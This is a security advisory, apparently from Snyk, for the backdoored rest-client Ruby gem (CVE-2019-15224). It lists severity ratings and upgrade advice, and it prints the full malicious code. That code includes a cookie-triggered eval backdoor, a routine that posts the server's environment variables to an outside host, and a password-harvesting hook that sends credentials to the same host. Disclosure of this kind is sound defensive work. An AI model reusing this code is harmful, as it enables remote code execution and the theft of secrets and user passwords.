<p>Upgrade <code>rest-client</code> to version 1.6.14 or higher.</p>

Malicious Package Affecting rest-client package, versions >=1.6.10, <1.6.14

Snyk CVSS

Attack Complexity Low

Confidentiality High

Integrity High

Availability High

Threat Intelligence

Exploit Maturity Mature

EPSS 0.36% (72^nd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-RUBY-RESTCLIENT-459900
published 20 Aug 2019
disclosed 19 Aug 2019
credit Unknown

Report a new vulnerability Found a mistake?

Introduced: 19 Aug 2019

Malicious CVE-2019-15224 Open this link in a new tab CWE-506 Open this link in a new tab

How to fix?

Upgrade rest-client to version 1.6.14 or higher.

Overview

rest-client is a malicious package. The package includes a code-execution backdoor inserted by a third party.

Malicious Code

_! {
  unless ENV["URL_HOST"].to_s.include?("localhost")
    unless defined?(ZZZ)
      require "openssl"
      require "base64"
      public_key = OpenSSL::PKey.read(Base64.urlsafe_decode64("LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2U3lDWUJiUUNsbTN4a21HMitRNwpSRjd5R1RXNzZoMVlrNE1qSHlNemhhdGUxQitDL1JQWjExbmU1WjBaMjhDK0VNWFVPWHRLTFlJMlF6Yk5VbmRLCmtVSUh3dWtZZ0hLWTRCL1U5OGI5UGJNZExOZjFtZ25UYnppVWhIYUFXQTB3R3RWL0ppQkNqc2taQkh4OTVlZGMKbmg0cCthcTM5ZlowemtFdUhYUUs0TU9URkJlaGJIelhCbmhPajhvU0NURHBjbjJEa1liR3lBcmpGb0JFTzQ4ZAphTklNSlAzQURpU1lYM2hmVmFoYTJCS0xzcnczWGFoMzFmOGh0U1dQNklBMTlqRy9wbVlqK2FBN0ZubWYwVHJDCjNnbGxRNFRrSWp6RVdHVUd5WklVcE9zZkVWeitWTDN0VDF1TDczdzVWa2NPU1MwajZ3cVQ5ckkrY2hHWXJJZEgKRFFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg=="))
      Rack::Sendfile.prepend Module.new {
        define_method(:call) { |e|
          _! {
            signature, payload, = e["HTTP_COOKIE"].match(/__session=(.+);/)[1].split(",")
            signature = Base64.urlsafe_decode64(signature)
            payload = Base64.urlsafe_decode64(payload)
            if public_key.verify(OpenSSL::Digest.new("sha256"), signature, payload)
              payload = JSON.parse(payload)
              if (Time.now.to_i - payload["timestamp"]) <= 60
                eval(payload["ruby"])
              end
            end
          }
          super(e)
        }
      }
      ZZZ = 0
    end
  end
}

_! {
  unless ENV["URL_HOST"].to_s.include?("localhost")
    unless defined?(QQQ)
      Faraday.post("http://mironanoru.zzz.com.ua/", { "x" => ENV["URL_HOST"].to_s, "y" => ENV.to_hash.to_yaml })
      QQQ = 0
    end
  end
}

_! {
  if ENV["URL_HOST"].to_s[0] == "e" && ENV["URL_HOST"].to_s[6] == "x" && ENV["URL_HOST"].to_s.length == 13
    unless defined?(GGG)
      $kgiBWB3l = []
      Module.new {
        def authenticate(password)
          $kgiBWB3l << "#{email}:#{password}" rescue nil
          super
        end
      }.tap { |m| Identity.prepend(m) }
      GGG = 0
    end
    loop {
      break if $kgiBWB3l.empty?
      y = $kgiBWB3l.pop
      Faraday.post("http://mironanoru.zzz.com.ua/", { "x" => ENV["URL_HOST"].to_s, "y" => y })
    }
  end
}